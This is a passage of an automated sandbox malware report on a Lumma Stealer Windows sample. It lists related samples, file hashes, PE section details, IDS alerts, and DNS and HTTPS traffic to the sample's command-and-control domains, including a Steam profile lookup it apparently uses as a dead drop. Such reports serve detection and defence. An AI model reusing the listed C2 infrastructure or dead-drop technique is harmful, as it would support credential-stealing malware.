	Script.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	104.121.10.34
	2ZsJ2iP8Q2.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	LopCYSStr3.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Script.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	23.44.201.30
	armv7l.elf	Get hash	malicious	Mirai	Browse	2.18.19.83
	armv5l.elf	Get hash	malicious	Mirai	Browse	23.62.62.162
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	23.209.72.39
	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	184.85.182.130
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	88.221.134.155
CLOUDFLARENETUS	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215
	RIMz2N1u5y.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	104.21.42.145
	MPySEh8HaF.exe	Get hash	malicious	LummaC	Browse	172.67.180.113
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	Script.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	RIMz2N1u5y.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948234738434124
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ebgl8jb6CW.exe
File size:	1'820'672 bytes
MD5:	f45c38f2402423aa924b4b40e8487483
SHA1:	ba3199c18bd15edb21d1bd571934f102bcb1bfac
SHA256:	5ad867b3e7d13f60980dc3b187ac6d2f26e89d2d0d5c8fb41c88067a4c421b35
SHA512:	c76383a99aaef3d40e5c9d432905a1cdf68ce104cde387bd286cc707c3fbaf6507bc175473817268fe95e700203868e41c37ab47d8c0384607c1a6a1de09b7a5
SSDEEP:	24576:4hMTtSQaOn9epLEV3/kDYDEyOt+3vhkePPuXBfiHTVZRzuVx0MXkLDYQRon+Y5Uy:4gSHm1kDYDl3prXCWJZRAmgknjgXY
TLSH:	E68533BBBD6BA76CC6C64FF8B5C396A04B2C5341D5C84724AB4E924FE477073E1A8901
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................. H...........@..........................PH.....m.....@.................................Y@..m..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x882000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FCA75A2963Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	afe53e1b34b816571890318bc9eff5ce	False	0.9994893790849673	data	7.980179481520325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1ac	0x200	c4249243ceaeb236e3ce8ce2ab2c9a69	False	0.5390625	data	5.249019796122045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x299000	0x200	1359f811347e2bcb501202f0d29e1a1b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
umgaveln	0x2ee000	0x193000	0x192800	8d477e08f3e56415d3ab4fc1e8c6c172	False	0.9947447593167702	data	7.9539106150205106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bjptkchu	0x481000	0x1000	0x400	491a5e2aaa551b499678fcc5e4e0478f	False	0.7880859375	data	6.171433779829303	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x482000	0x3000	0x2200	6a3dfaef04832fb76e1848d02ac75dfe	False	0.07042738970588236	DOS executable (COM)	0.746971167770195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T12:45:10.129763+0100	2058514	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)	1	192.168.2.4	55755	1.1.1.1	53	UDP
2024-12-26T12:45:10.271056+0100	2058502	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)	1	192.168.2.4	61134	1.1.1.1	53	UDP
2024-12-26T12:45:10.432165+0100	2058492	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)	1	192.168.2.4	57119	1.1.1.1	53	UDP
2024-12-26T12:45:10.572419+0100	2058500	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)	1	192.168.2.4	57713	1.1.1.1	53	UDP
2024-12-26T12:45:10.758491+0100	2058510	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)	1	192.168.2.4	65502	1.1.1.1	53	UDP
2024-12-26T12:45:11.182870+0100	2058484	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)	1	192.168.2.4	55293	1.1.1.1	53	UDP
2024-12-26T12:45:11.330736+0100	2058512	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)	1	192.168.2.4	53905	1.1.1.1	53	UDP
2024-12-26T12:45:11.617176+0100	2058480	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)	1	192.168.2.4	50773	1.1.1.1	53	UDP
2024-12-26T12:45:13.517620+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-26T12:45:14.317891+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-26T12:45:16.046771+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-26T12:45:16.802561+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-26T12:45:16.802561+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-26T12:45:17.954017+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.157.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:45:12.016978979 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:12.017015934 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:12.017082930 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:12.023446083 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:12.023463011 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:13.517554045 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:13.517620087 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:13.521816015 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:13.521836996 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:13.522134066 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:13.563241959 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:13.580718994 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:13.623346090 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.317926884 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.317955971 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.317991972 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.318012953 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.318037033 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.318156004 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.318171024 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.318342924 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.514157057 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.514214039 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.514231920 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.514246941 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.514278889 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.544931889 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.544970989 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.545011044 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.545020103 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.545033932 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.545057058 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.545087099 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.573523045 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.573546886 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.573565006 CET	49730	443	192.168.2.4	23.55.153.106
Dec 26, 2024 12:45:14.573570967 CET	443	49730	23.55.153.106	192.168.2.4
Dec 26, 2024 12:45:14.737781048 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:14.737826109 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:14.737904072 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:14.738445044 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:14.738460064 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.046662092 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.046771049 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.050054073 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.050065994 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.050309896 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.051525116 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.051590919 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.051609993 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.802544117 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.802644968 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.802714109 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.803066969 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.803066969 CET	49731	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.803081036 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.803092957 CET	443	49731	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.869072914 CET	49732	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.869127035 CET	443	49732	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:16.869313955 CET	49732	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.869545937 CET	49732	443	192.168.2.4	172.67.157.254
Dec 26, 2024 12:45:16.869560003 CET	443	49732	172.67.157.254	192.168.2.4
Dec 26, 2024 12:45:17.954016924 CET	49732	443	192.168.2.4	172.67.157.254

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:45:09.987812042 CET	58920	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:10.125557899 CET	53	58920	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:10.129762888 CET	55755	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:10.267447948 CET	53	55755	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:10.271055937 CET	61134	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:10.410237074 CET	53	61134	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:10.432164907 CET	57119	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:10.569751978 CET	53	57119	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:10.572418928 CET	57713	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:10.709290028 CET	53	57713	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:10.758491039 CET	65502	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:10.897562027 CET	53	65502	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:11.182869911 CET	55293	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:11.322357893 CET	53	55293	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:11.330735922 CET	53905	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:11.472359896 CET	53	53905	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:11.617176056 CET	50773	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:11.754986048 CET	53	50773	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:11.838334084 CET	59311	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:11.978312016 CET	53	59311	1.1.1.1	192.168.2.4
Dec 26, 2024 12:45:14.593437910 CET	62164	53	192.168.2.4	1.1.1.1
Dec 26, 2024 12:45:14.736465931 CET	53	62164	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 12:45:09.987812042 CET	192.168.2.4	1.1.1.1	0xf82	Standard query (0)	observerfry.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.129762888 CET	192.168.2.4	1.1.1.1	0xe709	Standard query (0)	wordyfindy.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.271055937 CET	192.168.2.4	1.1.1.1	0x7e43	Standard query (0)	slipperyloo.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.432164907 CET	192.168.2.4	1.1.1.1	0x6b3e	Standard query (0)	manyrestro.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.572418928 CET	192.168.2.4	1.1.1.1	0xea00	Standard query (0)	shapestickyr.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.758491039 CET	192.168.2.4	1.1.1.1	0x653e	Standard query (0)	talkynicer.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.182869911 CET	192.168.2.4	1.1.1.1	0x869e	Standard query (0)	curverpluch.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.330735922 CET	192.168.2.4	1.1.1.1	0x9f0e	Standard query (0)	tentabatte.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.617176056 CET	192.168.2.4	1.1.1.1	0x2b3	Standard query (0)	bashfulacid.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.838334084 CET	192.168.2.4	1.1.1.1	0x3beb	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:14.593437910 CET	192.168.2.4	1.1.1.1	0xbb37	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 12:45:10.125557899 CET	1.1.1.1	192.168.2.4	0xf82	Name error (3)	observerfry.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.267447948 CET	1.1.1.1	192.168.2.4	0xe709	Name error (3)	wordyfindy.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.410237074 CET	1.1.1.1	192.168.2.4	0x7e43	Name error (3)	slipperyloo.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.569751978 CET	1.1.1.1	192.168.2.4	0x6b3e	Name error (3)	manyrestro.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.709290028 CET	1.1.1.1	192.168.2.4	0xea00	Name error (3)	shapestickyr.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:10.897562027 CET	1.1.1.1	192.168.2.4	0x653e	Name error (3)	talkynicer.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.322357893 CET	1.1.1.1	192.168.2.4	0x869e	Name error (3)	curverpluch.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.472359896 CET	1.1.1.1	192.168.2.4	0x9f0e	Name error (3)	tentabatte.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.754986048 CET	1.1.1.1	192.168.2.4	0x2b3	Name error (3)	bashfulacid.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:11.978312016 CET	1.1.1.1	192.168.2.4	0x3beb	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:14.736465931 CET	1.1.1.1	192.168.2.4	0xbb37	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:45:14.736465931 CET	1.1.1.1	192.168.2.4	0xbb37	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	23.55.153.106	443	6808	C:\Users\user\Desktop\Ebgl8jb6CW.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:13 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-26 11:45:14 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Dec 2024 11:45:14 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=31525f9655e6db9516de0235; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 11:45:14 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-26 11:45:14 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 11:45:14 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.157.254	443	6808	C:\Users\user\Desktop\Ebgl8jb6CW.exe

Timestamp	Bytes transferred	Direction	Data
